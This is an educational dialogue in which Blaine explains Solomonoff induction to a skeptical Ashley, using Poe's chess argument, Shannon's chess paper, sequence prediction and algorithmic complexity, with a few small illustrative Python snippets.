BLAINE: I know, but it totally did happen and not in a metaphorical sense either! Edgar Allan Poe wrote an essay explaining why no automaton would ever be able to play chess, and he specifically mentioned "Mr. Babbage's computing engine" as an example. You see, in the nineteenth century, there was for a time this sensation known as the Mechanical Turk—supposedly a machine, an automaton, that could play chess. At the grandmaster level, no less. Now today, when we're accustomed to the idea that it takes a reasonably powerful computer to do that, we can know immediately that the Mechanical Turk must have been a fraud and that there must have been a concealed operator inside—a person with dwarfism, as it turned out. Today we know that this sort of thing is hard to build into a machine. But in the 19th century, even that much wasn't known. So when Edgar Allan Poe, who besides being an author was also an accomplished magician, set out to write an essay about the Mechanical Turk, he spent the second half of the essay dissecting what was known about the Turk's appearance to (correctly) figure out where the human operator was hiding. But Poe spent the first half of the essay arguing that no automaton—nothing like Mr. Babbage's computing engine—could possibly play chess, which was how he knew a priori that the Turk had a concealed human operator.

ASHLEY: And what was Poe's argument?

BLAINE: Poe observed that in an algebraical problem, each step followed from the previous step of necessity, which was why the steps in solving an algebraical problem could be represented by the deterministic motions of gears in something like Mr. Babbage's computing engine. But in a chess problem, Poe said, there are many possible chess moves, and no move follows with necessity from the position of the board; and even if you did select one move, the opponent's move would not follow with necessity, so you couldn't represent it with the determined motion of automatic gears. Therefore, Poe said, whatever was operating the Mechanical Turk must have the nature of Cartesian mind, rather than the nature of deterministic matter, and this was knowable a priori. And then he started figuring out where the required operator was hiding.

ASHLEY: That's some amazingly impressive reasoning for being completely wrong.

BLAINE: I know! Isn't it great?

ASHLEY: I mean, that sounds like Poe correctly identified the hard part of playing computer chess, the branching factor of moves and countermoves, which is the reason why no simple machine could do it. And he just didn't realize that a deterministic machine could deterministically check many possible moves in order to figure out the game tree. So close, and yet so far.

BLAINE: More than a century later, in 1950, Claude Shannon published the first paper ever written on computer chess. And in passing, Shannon gave the formula for playing perfect chess if you had unlimited computing power, the algorithm you'd use to extrapolate the entire game tree. We could say that Shannon gave a short program that would solve chess if you ran it on a hypercomputer, where a hypercomputer is an ideal computer that can run any finite computation immediately. And then Shannon passed on to talking about the problem of locally guessing how good a board position was, so that you could play chess using only a small search. I say all this to make a point about the value of knowing how to solve problems using hypercomputers, even though hypercomputers don't exist. Yes, there's often a huge gap between the unbounded solution and the practical solution. It wasn't until 1997, forty-seven years after Shannon's paper giving the unbounded solution, that Deep Blue actually won the world chess championship—

ASHLEY: And that wasn't just a question of faster computing hardware running Shannon's ideal search algorithm. There were a lot of new insights along the way, most notably the alpha-beta pruning algorithm and a lot of improvements in positional evaluation.

BLAINE: Right! But I think some people overreact to that forty-seven year gap, and act like it's worthless to have an unbounded understanding of a computer program, just because you might still be forty-seven years away from a practical solution. But if you don't even have a solution that would run on a hypercomputer, you're Poe in 1833, not Shannon in 1950. The reason I tell the anecdote about Poe is to illustrate that Poe was confused about computer chess in a way that Shannon was not. When we don't know how to solve a problem even given infinite computing power, the very work we are trying to do is in some sense murky to us.

BLAINE: Yes, but the point is that you can't even get started on that if you're arguing about how playing chess has the nature of Cartesian mind rather than matter. At that point you're not 50 years away from winning the chess championship, you're 150 years away, because it took an extra 100 years to move humanity's understanding to the point where Claude Shannon could trivially see how to play perfect chess using a large-enough computer. I'm not trying to exalt the unbounded solution by denigrating the work required to get a bounded solution. I'm not saying that when we have an unbounded solution we're practically there and the rest is a matter of mere lowly efficiency. I'm trying to compare having the unbounded solution to the horrific confusion of not understanding what we're trying to do.

ASHLEY: Okay. I think I understand why, on your view, it's important to know how to solve problems using infinitely fast computers, or hypercomputers as you call them. When we can say how to answer a question using infinite computing power, that means we crisply understand the question itself, in some sense; while if we can't figure out how to solve a problem using unbounded computing power, that means we're confused about the problem, in some sense. I mean, anyone who's ever tried to teach the more doomed sort of undergraduate to write code knows what it means to be confused about what it takes to compute something.

BLAINE: Right.

ASHLEY: So what does this have to do with "Solomonoff induction"?

BLAINE: Ah! Well, suppose I asked you how to do epistemology using infinite computing power?

ASHLEY: My good fellow, I would at once reply, "Beep. Whirr. Problem 'do epistemology' not crisply specified." At this stage of affairs, I do not think this reply indicates any fundamental confusion on my part; rather I think it is you who must be clearer.

BLAINE: Given unbounded computing power, how would you reason in order to construct an accurate map of reality?

ASHLEY: That still strikes me as rather underspecified.

BLAINE: Perhaps. But even there I would suggest that it's a mark of intellectual progress to be able to take vague and underspecified ideas like 'do good epistemology' and turn them into crisply specified problems. Imagine that I went up to my friend Cecil, and said, "How would you do good epistemology given unlimited computing power and a short Python program?" and Cecil at once came back with an answer—a good and reasonable answer, once it was explained. Cecil would probably know something quite interesting that you do not presently know.

ASHLEY: I confess to being rather skeptical of this hypothetical. But if that actually happened—if I agreed, to my own satisfaction, that someone had stated a short Python program that would 'do good epistemology' if run on an unboundedly fast computer—then I agree that I'd probably have learned something quite interesting about epistemology.

BLAINE: What Cecil knows about, in this hypothetical, is Solomonoff induction. In the same way that Claude Shannon answered "Given infinite computing power, how would you play perfect chess?", Ray Solomonoff answered "Given infinite computing power, how would you perfectly find the best hypothesis that fits the facts?"

ASHLEY: Suddenly, I find myself strongly suspicious of whatever you are about to say to me.

BLAINE: That's understandable.

ASHLEY: In particular, I'll ask at once whether "Solomonoff induction" assumes that our hypotheses are being given to us on a silver platter along with the exact data we're supposed to explain, or whether the algorithm is organizing its own data from a big messy situation and inventing good hypotheses from scratch.

BLAINE: Great question! It's the second one.

ASHLEY: Really? Okay, now I have to ask whether Solomonoff induction is a recognized concept in good standing in the field of academic computer science, because that does not sound like something modern-day computer science knows how to do.

BLAINE: I wouldn't say it's a widely known concept, but it's one that's in good academic standing. The method isn't used in modern machine learning because it requires an infinitely fast computer and isn't easily approximated the way that chess is.

ASHLEY: This really sounds very suspicious. Last time I checked, we hadn't begun to formalize the creation of good new hypotheses from scratch. I've heard about claims to have 'automated' the work that, say, Newton did in inventing classical mechanics, and I've found them all to be incredibly dubious. Which is to say, they were rigged demos and lies.

BLAINE: I know, but—

ASHLEY: And then I'm even more suspicious of a claim that someone's algorithm would solve this problem if only they had infinite computing power. Having some researcher claim that their Good-Old-Fashioned AI semantic network would be intelligent if run on a computer so large that, conveniently, nobody can ever test their theory, is not going to persuade me.

BLAINE: Do I really strike you as that much of a charlatan? What have I ever done to you, that you would expect me to try pulling a scam like that?

ASHLEY: That's fair. I shouldn't accuse you of planning that scam when I haven't seen you say it. But I'm pretty sure the problem of "coming up with good new hypotheses in a world full of messy data" is AI-complete. And even Mentif-

BLAINE: Do not say the name, or he will appear!

ASHLEY: Sorry. Even the legendary first and greatest of all AI crackpots, He-Who-Googles-His-Name, could assert that his algorithms would be all-powerful on a computer large enough to make his claim unfalsifiable. So what?

BLAINE: That's a very sensible reply and this, again, is exactly the kind of mental state that reflects a problem that is confusing rather than just hard to implement. It's the sort of confusion Poe might feel in 1833, or close to it. In other words, it's just the sort of conceptual issue we would have solved at the point where we could state a short program that could run on a hypercomputer. Which Ray Solomonoff did in 1964.

ASHLEY: Okay, let's hear about this supposed general solution to epistemology.

ii. Sequences

BLAINE: First, try to solve the following puzzle. 1, 3, 4, 7, 11, 18, 29...?

ASHLEY: Let me look at those for a moment... 47.

BLAINE: Congratulations on engaging in, as we snooty types would call it, 'sequence prediction'.

ASHLEY: I'm following you so far.

BLAINE: The smarter you are, the more easily you can find the hidden patterns in sequences and predict them successfully. You had to notice the resemblance to the Fibonacci rule to guess the next number. Someone who didn't already know about Fibonacci, or who was worse at mathematical thinking, would have taken longer to understand the sequence or maybe never learned to predict it at all.

ASHLEY: Still with you.

BLAINE: It's not a sequence of numbers per se... but can you see how the question, "The sun has risen on the last million days. What is the probability that it rises tomorrow?" could be viewed as a kind of sequence prediction problem?

ASHLEY: Only if some programmer neatly parses up the world into a series of "Did the Sun rise on day X starting in 4.5 billion BCE, 0 means no and 1 means yes? 1, 1, 1, 1, 1..." and so on. Which is exactly the sort of shenanigan that I see as cheating. In the real world, you go outside and see a brilliant ball of gold touching the horizon, not a giant "1".

BLAINE: Suppose I have a robot running around with a webcam showing it a pixel field that refreshes 60 times a second with 32-bit colors. I could view that as a giant sequence and ask the robot to predict what it will see happen when it rolls out to watch a sunrise the next day.

ASHLEY: I can't help but notice that the 'sequence' of webcam frames is absolutely enormous, like, the sequence is made up of 66-megabit 'numbers' appearing 3600 times per minute... oh, right, computers much bigger than the universe. And now you're smiling evilly, so I guess that's the point. I also notice that the sequence is no longer deterministically predictable, that it is no longer a purely mathematical object, and that the sequence of webcam frames observed will depend on the robot's choices. This makes me feel a bit shaky about the analogy to predicting the mathematical sequence 1, 1, 2, 3, 5.

BLAINE: I'll try to address those points in order. First, Solomonoff induction is about assigning probabilities to the next item in the sequence.
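(The puzzle sequence above follows a Fibonacci-style rule, each term being the sum of the two before it but starting from 1 and 3; a minimal sketch of noticing and extrapolating that rule:)

```python
def predict_next(seq):
    """Predict the next term, assuming each term is the sum
    of the two preceding terms (a Fibonacci-style rule)."""
    return seq[-1] + seq[-2]

seq = [1, 3, 4, 7, 11, 18, 29]
# First check that the rule actually fits every observed term...
assert all(seq[i] == seq[i - 1] + seq[i - 2] for i in range(2, len(seq)))
# ...then extrapolate it one step, as Ashley did.
print(predict_next(seq))  # -> 47
```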
BLAINE: I mean, if I showed you a box that said 1, 1, 2, 3, 5, 8 you would not be absolutely certain that the next item would be 13. There could be some more complicated rule that just looked Fibonacci-ish but then diverged. You might guess with 90% probability but not 100% probability, or something like that.

ASHLEY: This has stopped feeling to me like math.

BLAINE: There is a large branch of math, to say nothing of computer science, that deals in probabilities and statistical prediction. We are going to be describing absolutely lawful and deterministic ways of assigning probabilities after seeing 1, 3, 4, 7, 11, 18.

ASHLEY: Okay, but if you're later going to tell me that this lawful probabilistic prediction rule underlies a generally intelligent reasoner, I'm already skeptical. No matter how large a computer it's run on, I find it hard to imagine that some simple set of rules for assigning probabilities is going to encompass truly and generally intelligent answers about sequence prediction, like Terence Tao would give after looking at the sequence for a while. We just have no idea how Terence Tao works, so we can't duplicate his abilities in a formal rule, no matter how much computing power that rule gets... you're smiling evilly again. I'll be quite interested if that evil smile turns out to be justified.

BLAINE: Indeed.

ASHLEY: I also find it hard to imagine that this deterministic mathematical rule for assigning probabilities would notice if a box was outputting an encoded version of "To be or not to be" from Shakespeare by mapping A to Z onto 1 to 26, which I would notice eventually though not immediately upon seeing 20, 15, 2, 5, 15, 18... And you're still smiling evilly.

BLAINE: Indeed. That is exactly what Solomonoff induction does. Furthermore, we have theorems establishing that Solomonoff induction can do it way better than you or Terence Tao.

ASHLEY: A theorem proves this. As in a necessary mathematical truth.
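(The letter-coded box Ashley describes maps A through Z onto 1 through 26, so her example numbers can be checked directly; a quick sketch:)

```python
def decode(nums):
    """Map 1..26 back onto 'a'..'z'."""
    return "".join(chr(ord('a') + n - 1) for n in nums)

def encode(text):
    """Map 'a'..'z' onto 1..26."""
    return [ord(c) - ord('a') + 1 for c in text.lower()]

print(decode([20, 15, 2, 5, 15, 18]))  # -> 'tobeor'
# The continuation 'tobeornottobe...' predicts the box's next output,
# the letter 'n':
print(encode("n"))  # -> [14]
```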
ASHLEY: Even though we have no idea how Terence Tao works empirically... and there's evil smile number four. Okay. I am very skeptical, but willing to be convinced.

BLAINE: So if you actually did have a hypercomputer, you could cheat, right? And Solomonoff induction is the most ridiculously cheating cheat in the history of cheating.

ASHLEY: Go on.

BLAINE: We just run all possible computer programs to see which are the simplest computer programs that best predict the data seen so far, and use those programs to predict what comes next. This mixture contains, among other things, an exact copy of Terence Tao, thereby allowing us to prove theorems about their relative performance.

ASHLEY: Is this an actual reputable math thing? I mean really?

BLAINE: I'll deliver the formalization later, but you did ask me to first state the point of it all. The point of Solomonoff induction is that it gives us a gold-standard ideal for sequence prediction, and this gold-standard prediction only errs by a bounded amount, over infinite time, relative to the best computable sequence predictor. We can also see it as formalizing the intuitive idea that was expressed by William Ockham a few centuries earlier that simpler theories are more likely to be correct, and as telling us that 'simplicity' should be measured in algorithmic complexity, which is the size of a computer program required to output a hypothesis's predictions.

ASHLEY: I think I would have to read more on this subject to actually follow that. What I'm hearing is that Solomonoff induction is a reputable idea that is important because it gives us a kind of ideal for sequence prediction. This ideal also has something to do with Occam's Razor, and stakes a claim that the simplest theory is the one that can be represented by the shortest computer program. You identify this with "doing good epistemology".

BLAINE: Yes, those are legitimate takeaways.
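(As a toy illustration of the "weight simpler programs more heavily, then update" idea only — the real formalism ranges over all computable programs, not a hand-picked list, and these "program lengths" in bits are made up for the example:)

```python
from fractions import Fraction

# A few hand-written hypotheses about the next bit, each with an
# invented "program length" K in bits and a rule giving P(next bit = 1)
# as a function of the bits seen so far. Prior weight is 2**-K, so
# shorter (simpler) hypotheses start out more probable.
hypotheses = {
    "always-1":  (3, lambda history: Fraction(1)),
    "always-0":  (3, lambda history: Fraction(0)),
    "alternate": (5, lambda history:
                  Fraction(1) - history[-1] if history else Fraction(1, 2)),
    "uniform":   (1, lambda history: Fraction(1, 2)),
}

def posterior(data):
    """Score each hypothesis by 2**-length times the probability
    it assigned to the observed bits, then normalize."""
    scores = {}
    for name, (length, prob_of_1) in hypotheses.items():
        w = Fraction(1, 2 ** length)
        for i, bit in enumerate(data):
            p1 = prob_of_1(data[:i])
            w *= p1 if bit == 1 else 1 - p1
        scores[name] = w
    total = sum(scores.values())
    return {name: w / total for name, w in scores.items()}

print(posterior([1, 1, 1, 1]))  # "always-1" dominates after four 1s
```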
BLAINE: Another way of looking at it is that Solomonoff induction is an ideal but uncomputable answer to the question "What should our priors be?", which is left open by understanding Bayesian updating.

ASHLEY: Can you say how Solomonoff induction answers the question of, say, the prior probability that Canada is planning to invade the United States? I once saw a crackpot website that tried to invoke Bayesian probability about it, but only after setting the prior at 10% or something like that, I don't recall exactly. Does Solomonoff induction let me tell him that he's making a math error, instead of just calling him silly in an informal fashion?

BLAINE: If you're expecting to sit down with Leibniz and say, "Gentlemen, let us calculate" then you're setting your expectations too high. Solomonoff gives us an idea of how we should compute that quantity given unlimited computing power. It doesn't give us a firm recipe for how we can best approximate that ideal in real life using bounded computing power, or human brains. That's like expecting to play perfect chess after you read Shannon's 1950 paper. But knowing the ideal, we can extract some intuitive advice that might help our online crackpot if only he'd listen.

ASHLEY: But according to you, Solomonoff induction does say in principle what is the prior probability that Canada will invade the United States.

BLAINE: Yes, up to a choice of universal Turing machine.

ASHLEY: (looking highly skeptical) So I plug a universal Turing machine into the formalism, and in principle, I get out a uniquely determined probability that Canada invades the USA.

BLAINE: Exactly!

ASHLEY: Uh huh. Well, go on.

BLAINE: So, first, we have to transform this into a sequence prediction problem.

ASHLEY: Like a sequence of years in which Canada has and hasn't invaded the US, mostly zero except around 1812—

BLAINE: No! To get a good prediction about Canada we need much more data than that, and I don't mean a graph of Canadian GDP either. Imagine a sequence that contains all the sensory data you have ever received over your lifetime. Not just the hospital room that you saw when you opened your eyes right after your birth, but the darkness your brain received as input while you were still in your mother's womb. Every word you've ever heard. Every letter you've ever seen on a computer screen, not as ASCII letters but as the raw pattern of neural impulses that gets sent down from your retina.

ASHLEY: That seems like a lot of data and some of it is redundant, like there'll be lots of similar pixels for blue sky—

BLAINE: That data is what you got as an agent. If we want to translate the question of the prediction problem Ashley faces into theoretical terms, we should give the sequence predictor all the data that you had available, including all those repeating blue pixels of the sky. Who knows? Maybe there was a Canadian warplane somewhere in there, and you didn't notice.

ASHLEY: But it's impossible for my brain to remember all that data. If we neglect for the moment how the retina actually works and suppose that I'm seeing the same 60Hz feed the robot would, that's far more data than my brain can realistically learn per second.

BLAINE: So then Solomonoff induction can do better than you can, using its unlimited computing power and memory. That's fine.

ASHLEY: But what if you can do better by forgetting more?

BLAINE: If you have limited computing power, that makes sense. With unlimited computing power, that really shouldn't happen and that indeed is one of the lessons of Solomonoff induction. An unbounded Bayesian never expects to do worse by updating on another item of evidence—for one thing, you can always just do the same policy you would have used if you hadn't seen that evidence. That kind of lesson is one of the lessons that might not be intuitively obvious, but which you can feel more deeply by walking through the math of probability theory. With unlimited computing power, nothing goes wrong as a result of trying to process 4 gigabits per second; every extra bit just produces a better expected future prediction.

ASHLEY: Okay, so we start with literally all the data I have available. That's 4 gigabits per second if we imagine frames of 32-bit pixels repeating 60 times per second. Though I remember hearing 100 megabits per second would be a better estimate of what the retina sends out, and that it's pared down to 1 megabit per second very quickly by further processing.

BLAINE: Right. We start with all of that data, going back to when you were born. Or maybe when your brain formed in the womb, though it shouldn't make much difference.

ASHLEY: I note that there are some things I know that don't come from my sensory inputs at all. Chimpanzees learn to be afraid of skulls and snakes much faster than they learn to be afraid of other arbitrary shapes. I was probably better at learning to walk in Earth gravity than I would have been at navigating in zero G. Those are heuristics I'm born with, based on how my brain was wired, which ultimately stems from my DNA specifying the way that proteins should fold to form neurons—not from any photons that entered my eyes later.

BLAINE: So, for purposes of following along with the argument, let's say that your DNA is analogous to the code of a computer program that makes predictions. What you're observing here is that humans have 750 megabytes of DNA, and even if most of that is junk and not all of what's left is specifying brain behavior, it still leaves a pretty large computer program that could have a lot of prior information programmed into it. Let's say that your brain, or rather, your infant pre-brain wiring algorithm, was effectively a 7.5 megabyte program—if it's actually 75 megabytes, that makes little difference to the argument. By exposing that 7.5 megabyte program to all the information coming in from your eyes, ears, nose, proprioceptive sensors telling you where your limbs were, and so on, your brain updated itself into forming the modern Ashley, whose hundred trillion synapses might be encoded by, say, one petabyte of information.

ASHLEY: The thought does occur to me that some environmental phenomena have effects on me that can't be interpreted as "sensory information" in any simple way, like the direct effect that alcohol has on my neurons, and how that feels to me from the inside. But it would be perverse to claim that this prevents you from trying to summarize all the information that the Ashley-agent receives into a single sequence, so I won't press the point.

(ELIEZER: (whispering) More on this topic later.)

ASHLEY: Oh, and for completeness's sake, wouldn't there also be further information embedded in the laws of physics themselves? Like, the way my brain executes implicitly says something about the laws of physics in the universe I'm in.

BLAINE: Metaphorically speaking, our laws of physics would play the role of a particular choice of Universal Turing Machine, which has some effect on which computations count as "simple" inside the Solomonoff formula. But normally, the UTM should be very simple compared to the amount of data in the sequence we're trying to predict, just like the laws of physics are very simple compared to a human brain. In terms of algorithmic complexity, the laws of physics are very simple compared to watching a 60Hz visual field for a day.

ASHLEY: Part of my mind feels like the laws of physics are quite complicated compared to going outside and watching a sunset. Like, I realize that's false, but I'm not sure how to say out loud exactly why it's false...

BLAINE: Because the algorithmic complexity of a system isn't measured by how long a human has to go to college to understand it, it's measured by the size of the computer program required to generate it. The language of physics is differential equations, and it turns out that this is something difficult to beat into some human brains, but differential equations are simple to program into a simple Turing Machine.

ASHLEY: Right, like, the laws of physics actually have far fewer details to them than, say, human nature. At least on the Standard Model of Physics. I mean, in principle there could be another decillion undiscovered particle families out there.

BLAINE: The concept of "algorithmic complexity" isn't about seeing something with lots of gears and details, it's about the size of computer program required to compress all those details. The Mandelbrot set looks very complicated visually, you can keep zooming in using more and more detail, but there's a very simple rule that generates it, so we say the algorithmic complexity is very low.

ASHLEY: All the visual information I've seen is something that happens within the physical universe, so how can it be more complicated than the universe? I mean, I have a sense on some level that this shouldn't be a problem, but I don't know why it's not a problem.

BLAINE: That's because particular parts of the universe can have much higher algorithmic complexity than the entire universe! Consider a library that contains all possible books. It's very easy to write a computer program that generates all possible books. So any particular book in the library contains much more algorithmic information than the entire library; it contains the information required to say 'look at this particular book here'. If pi is normal, then somewhere in its digits is a copy of Shakespeare's Hamlet—but the number saying which particular digit of pi to start looking at, will be just about exactly as large as Hamlet itself. The copy of Shakespeare's Hamlet that exists in the decimal expansion of pi is more complex than pi itself.
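(Blaine's Mandelbrot example is easy to make concrete: the whole endlessly detailed set is generated by one tiny rule, iterating z → z² + c and checking whether the orbit stays bounded; a sketch:)

```python
def in_mandelbrot(c, max_iter=100):
    """The entire rule generating the Mandelbrot set: iterate
    z -> z*z + c and check whether the orbit stays bounded."""
    z = 0j
    for _ in range(max_iter):
        z = z * z + c
        if abs(z) > 2:          # provably escapes to infinity
            return False
    return True

# A crude ASCII rendering: endless visual detail, a few lines of code.
for y in range(11):
    row = ""
    for x in range(40):
        c = complex(-2 + x * 0.0625, -1 + y * 0.2)
        row += "#" if in_mandelbrot(c) else "."
    print(row)
```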
BLAINE: If you zoomed way in and restricted your vision to a particular part of the Mandelbrot set, what you saw might be much more algorithmically complex than the entire Mandelbrot set, because the specification has to say where in the Mandelbrot set you are. Similarly, the planet Earth is much more algorithmically complex than the laws of physics. Likewise, the visual field you see over the course of a second can easily be far more algorithmically complex than the laws of physics.

ASHLEY: Okay, I think I get that. And similarly, even though the ways that proteins fold up are very complicated, in principle we could get all that info using just the simple fundamental laws of physics plus the relatively simple DNA code for the protein. There are all sorts of obvious caveats about epigenetics and so on, but those caveats aren't likely to change the numbers by a whole order of magnitude.

BLAINE: Right!

ASHLEY: So the laws of physics are, like, a few kilobytes, and my brain has say 75 megabytes of innate wiring instructions. And then I get to see a lot more information than that over my lifetime, like a megabit per second after my initial visual system finishes preprocessing it, and then most of that is forgotten. Uh... what does that have to do with Solomonoff induction again?

BLAINE: Solomonoff induction quickly catches up to any single computer program at sequence prediction, even if the original program is very large and contains a lot of prior information about the environment. If a program is 75 megabytes long, it can only predict 75 megabytes worth of data better than the Solomonoff inductor before the Solomonoff inductor catches up to it. That doesn't mean that a Solomonoff inductor knows everything a baby does after the first second of exposure to a webcam feed, but it does mean that after the first second, the Solomonoff inductor is already no more surprised than a baby by the vast majority of pixels in the next frame.
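(Blaine's "75 megabytes of error" claim is the standard dominance bound. As a sketch of the usual argument: writing M for the Solomonoff mixture and q for any computable predictor whose program is ℓ(q) bits long, M assigns q prior weight at least 2^(-ℓ(q)), so

```latex
M(x_{1:n}) \;\ge\; 2^{-\ell(q)}\, q(x_{1:n})
\quad\Longrightarrow\quad
\sum_{t=1}^{n} \log_2 \frac{q(x_t \mid x_{<t})}{M(x_t \mid x_{<t})}
\;=\; \log_2 \frac{q(x_{1:n})}{M(x_{1:n})}
\;\le\; \ell(q).
```

That is, summed over the whole infinite sequence, M loses at most ℓ(q) bits of log-probability relative to q — the "bits spent" accounting Blaine describes next.)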
Every time the Solomonoff inductor assigns half as much probability as the baby to the next pixel it sees, that's one bit spent permanently out of the 75 megabytes of error that can happen before the Solomonoff inductor catches up to the baby. That your brain is written in the laws of physics also has some implicit correlation with the environment, but that's like saying that a program is written in the same programming language as the environment. The language can contribute something to the power of the program, and the environment being written in the same programming language can be a kind of prior knowledge. But if Solomonoff induction starts from a standard Universal Turing Machine as its language, that doesn't contribute any more bits of lifetime error than the complexity of that programming language in the UTM. ASHLEY: Let me jump back a couple of steps and return to the notion of my brain wiring itself up in response to environmental information. I'd expect an important part of that process was my brain learning to control the environment, not just passively observing it. Like, it mattered to my brain's wiring algorithm that my brain saw the room shift in a certain way when it sent out signals telling my eyes to move. BLAINE: Indeed. But talking about the sequential control problem is more complicated math. AIXI is the ideal agent that uses Solomonoff induction as its epistemology and expected reward as its decision theory. That introduces extra complexity, so it makes sense to talk about just Solomonoff induction first. We can talk about AIXI later. So imagine for the moment that we were just looking at your sensory data, and trying to predict what would come next in that. ASHLEY: Wouldn't it make more sense to look at the brain's inputs and outputs, if we wanted to predict the next input? Not just look at the series of previous inputs? 
BLAINE: It'd make the problem easier for a Solomonoff inductor to solve, sure; but it also makes the problem more complicated. Let's talk instead about what would happen if you took the complete sensory record of your life, gave it to an ideally smart agent, and asked the agent to predict what you would see next. Maybe the agent could do an even better job of prediction if we also told it about your brain's outputs, but I don't think that subtracting the outputs would leave it helpless to see patterns in the inputs. ASHLEY: It sounds like a pretty hard problem to me, maybe even an unsolvable one. I'm thinking of the distinction in computer science between needing to learn from non-chosen data, versus learning when you can choose particular queries. Learning can be much faster in the second case. BLAINE: In terms of what can be predicted in principle given the data, what facts are actually reflected in it that Solomonoff induction might uncover, we shouldn't imagine a human trying to analyze the data. We should imagine an entire advanced civilization pondering it for years. If you look at it from that angle, then the alien civilization isn't going to balk at the fact that it's looking at the answers to the queries that Ashley's brain chose, instead of the answers to the queries it chose itself. Like, if the Ashley had already read Shakespeare's Hamlet—if the image of those pages had already crossed the sensory stream—and then the Ashley saw a mysterious box outputting 20, 15, 2, 5, 15, 18, I think somebody eavesdropping on that sensory data would be equally able to guess that this was encoding 'tobeor' and guess that the next thing the Ashley saw might be the box outputting 14. You wouldn't even need an entire alien civilization of superintelligent cryptographers to guess that. And it definitely wouldn't be a killer problem that Ashley was controlling the eyeball's saccades, even if you could learn even faster by controlling the eyeball yourself. 
So far as the computer-science distinction goes, Ashley's eyeball is being controlled to make intelligent queries and seek out useful information; it's just Ashley controlling the eyeball instead of you—that eyeball is not a query-oracle answering random questions.
ASHLEY: Okay, I think this example is helping my understanding of what we're doing here. In the case above, the next item in the Ashley-sequence wouldn't actually be 14. It would be this huge visual field that showed the box flashing a little picture of '14'.
BLAINE: Sure. Otherwise it would be a rigged demo, as you say.
ASHLEY: I think I'm confused about the idea of predicting the visual field. It seems to me that what with all the dust specks in my visual field, and maybe my deciding to tilt my head using motor instructions that won't appear in the sequence, there's no way to exactly predict the 66-megabit integer representing the next visual frame. So it must be doing something other than the equivalent of guessing "14" in a simpler sequence, but I'm not sure what.
BLAINE: Indeed, there'd be some element of thermodynamic and quantum randomness preventing that exact prediction even in principle. So instead of predicting one particular next frame, we put a probability distribution on it.
ASHLEY: A probability distribution over possible 66-megabit frames? Like, a table with 2^66,000,000 entries, summing to 1?
BLAINE: Sure. 2^66,000,000 isn't a large number when you have unlimited computing power. As Martin Gardner once observed, "Most finite numbers are very much larger." Like I said, Solomonoff induction is an epistemic ideal that requires an unreasonably large amount of computing power.
ASHLEY: I don't deny that big computations can sometimes help us understand little ones. But at the point when we're talking about probability distributions that large, I have some trouble holding onto what the probability distribution is supposed to mean.
BLAINE: Really?
Just imagine a probability distribution over 26 possibilities, then let 26 go to 2^66,000,000. If we were talking about a letter ranging from A to Z, then putting 100 times as much probability mass on (X, Y, Z) as on the rest of the alphabet would say that although you didn't know exactly what letter would happen, you expected it would be toward the end of the alphabet. You would have used 26 probabilities, summing to 1, to precisely state that prediction. In Solomonoff induction, since we have unlimited computing power, we express our uncertainty about a video frame the same way. All the various pixel fields you could see if your eye jumped to a plausible place, saw a plausible number of dust specks, and saw the box flash something that visually encoded '14', would have high probability. Pixel fields where the box vanished and was replaced with a glow-in-the-dark unicorn would have very low, though not zero, probability.
ASHLEY: Can we really get away with viewing things that way?
BLAINE: If we could not make identifications like these in principle, there would be no principled way in which we could say that you had ever expected to see something happen—no way to say that one visual field your eyes saw had higher probability than any other sensory experience. We couldn't justify science; we couldn't say that, having performed Galileo's experiment by rolling a ball down an inclined plane, Galileo's theory was thereby to some degree supported by having assigned a high relative probability to the only actual observations our eyes ever report.
ASHLEY: I feel a little unsure of that jump, but I suppose I can go along with that for now. Then the question of "What probability does Solomonoff induction assign to Canada invading?"
is to be identified, in principle, with the question "Given my past life experiences and all the visual information that's entered my eyes, what is the relative probability of seeing visual information that encodes Google News with the headline 'CANADA INVADES USA' at some point during the next 300 million seconds?"
BLAINE: Right!
ASHLEY: And Solomonoff induction has an in-principle way of assigning this a relatively low probability, which that online crackpot would do well to learn from as a matter of principle, even if he couldn't begin to carry out the exact calculations that involve assigning probabilities to exponentially vast tables.
BLAINE: Precisely!
ASHLEY: Fairness requires that I congratulate you on having come further in formalizing 'do good epistemology' as a sequence prediction problem than I previously thought you might. I mean, you haven't satisfied me yet, but I wasn't expecting you to get even this far.

iii. Hypotheses

BLAINE: Next, we consider how to represent a hypothesis inside this formalism.
ASHLEY: Hmm. You said something earlier about updating on a probabilistic mixture of computer programs, which leads me to suspect that in this formalism, a hypothesis or way the world can be is a computer program that outputs a sequence of integers.
BLAINE: There's indeed a version of Solomonoff induction that works like that. But I prefer the version where a hypothesis assigns probabilities to sequences. Like, if the hypothesis is that the world is a fair coin, then we shouldn't try to make that hypothesis predict "heads—tails—tails—tails—heads" but should let it just assign a prior probability to the sequence HTTTH.
ASHLEY: I can see that for coins, but I feel a bit iffier on what this means as a statement about the real world.
BLAINE: A single hypothesis inside the Solomonoff mixture would be a computer program that took in a series of video frames, and assigned a probability to each possible next video frame.
Or for greater simplicity and elegance, imagine a program that took in a sequence of bits, ones and zeroes, and output a rational number for the probability of the next bit being '1'. We can readily go back and forth between a program like that, and a probability distribution over sequences. Like, if you can answer all of the questions, "What's the probability that the coin comes up heads on the first flip?", "What's the probability of the coin coming up heads on the second flip, if it came up heads on the first flip?", and "What's the probability that the coin comes up heads on the second flip, if it came up tails on the first flip?" then we can turn that into a probability distribution over sequences of two coinflips. Analogously, if we have a program that outputs the probability of the next bit, conditioned on a finite number of previous bits taken as input, that program corresponds to a probability distribution over infinite sequences of bits.
ASHLEY: I think I followed along with that in theory, though it's not a type of math I'm used to (yet). So then in what sense is a program that assigns probabilities to sequences, a way the world could be—a hypothesis about the world?
BLAINE: Well, I mean, for one thing, we can see the infant Ashley as a program with 75 megabytes of information about how to wire up its brain in response to sense data, that sees a bunch of sense data, and then experiences some degree of relative surprise. Like in the baby-looking-paradigm experiments where you show a baby an object disappearing behind a screen, and the baby looks longer at those cases, and so we suspect that babies have a concept of object permanence.
ASHLEY: That sounds like a program that's a way Ashley could be, not a program that's a way the world could be.
BLAINE: Those indeed are dual perspectives on the meaning of Solomonoff induction.
Maybe we can shed some light on this by considering a simpler induction rule, Laplace's Rule of Succession, invented by the Reverend Thomas Bayes in the 1750s, and named after Pierre-Simon Laplace, the inventor of Bayesian reasoning.
ASHLEY: Pardon me?
BLAINE: Suppose you have a biased coin with an unknown bias, and every possible bias between 0 and 1 is equally probable.
ASHLEY: Okay. Though in the real world, it's quite likely that an unknown frequency is exactly 0, 1, or 1/2. If you assign equal probability density to every part of the real number line between 0 and 1, the probability of 1/2 is zero. Indeed, the probability of all rational numbers put together is zero.
